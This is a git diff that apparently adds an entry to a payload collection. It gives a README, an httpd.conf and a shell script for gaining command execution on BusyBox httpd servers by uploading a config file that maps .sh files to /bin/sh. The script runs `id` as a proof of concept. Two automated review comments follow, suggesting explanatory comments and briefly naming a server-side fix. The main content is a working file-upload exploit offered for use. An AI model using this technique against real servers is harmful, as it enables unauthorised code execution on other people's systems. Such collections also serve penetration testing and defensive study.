diff --git a/Upload insecure files/Busybox httpd.conf/README.md b/Upload insecure files/Busybox httpd.conf/README.md
new file mode 100644
index 0000000..67f71a6
--- /dev/null
+++ b/Upload insecure files/Busybox httpd.conf/README.md
@@ -0,0 +1,11 @@
+If you have upload access to a non /cgi-bin folder - upload a httpd.conf and configure your own interpreter.
+
+Details from Busybox httpd.c
+
+https://github.com/brgl/busybox/blob/abbf17abccbf832365d9acf1c280369ba7d5f8b2/networking/httpd.c#L60
+
+> *.php:/path/php # run xxx.php through an interpreter`
+
+> If a sub directory contains config file, it is parsed and merged with any existing settings as if it was appended to the original configuration.
+
+Watch out for Windows CRLF line endings messing up your payload (you will just get 404 errors) - you cant see these in Burp :)
diff --git a/Upload insecure files/Busybox httpd.conf/httpd.conf b/Upload insecure files/Busybox httpd.conf/httpd.conf
new file mode 100644
index 0000000..da4bd65
--- /dev/null
+++ b/Upload insecure files/Busybox httpd.conf/httpd.conf
@@ -0,0 +1 @@
+*.sh:/bin/sh
diff --git a/Upload insecure files/Busybox httpd.conf/shellymcshellface.sh b/Upload insecure files/Busybox httpd.conf/shellymcshellface.sh
new file mode 100644
index 0000000..0282e4b
--- /dev/null
+++ b/Upload insecure files/Busybox httpd.conf/shellymcshellface.sh
@@ -0,0 +1,3 @@
+echo "Content-type: text/html"
+echo ""
+echo `id`
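Review bot: The only line of the new httpd.conf, `*.sh:/bin/sh`, has no comment, so the file on its own does not say that the mapping takes effect only because BusyBox httpd parses a config file found in a sub directory and merges it with the existing settings, as the README in this commit quotes. Using the `#` comment form shown in that README quote, I would add a line above it such as `# maps every *.sh below this directory to /bin/sh; depends on httpd merging per-directory httpd.conf files`. That also records the precondition being tested: an upload location inside the served tree that accepts a file with this exact name. The corresponding server-side fix is presumably to reject that filename or keep uploads outside the document root.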
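Review bot: The last line of shellymcshellface.sh, ``echo `id` ``, uses legacy backticks and leaves the substitution unquoted, so the output of id is word-split and re-joined by echo before it is written; calling `id` on its own line produces the same text without the extra expansion. The script has no shebang or header comment, which works only because the interpreter comes from the `*.sh:/bin/sh` mapping in the sibling httpd.conf. A first-line comment such as `# CGI check: prints the identity the httpd process runs scripts as; interpreter is set by httpd.conf` would make that dependency visible. Since the body is plain text, `Content-type: text/plain` would describe it more accurately than `text/html`.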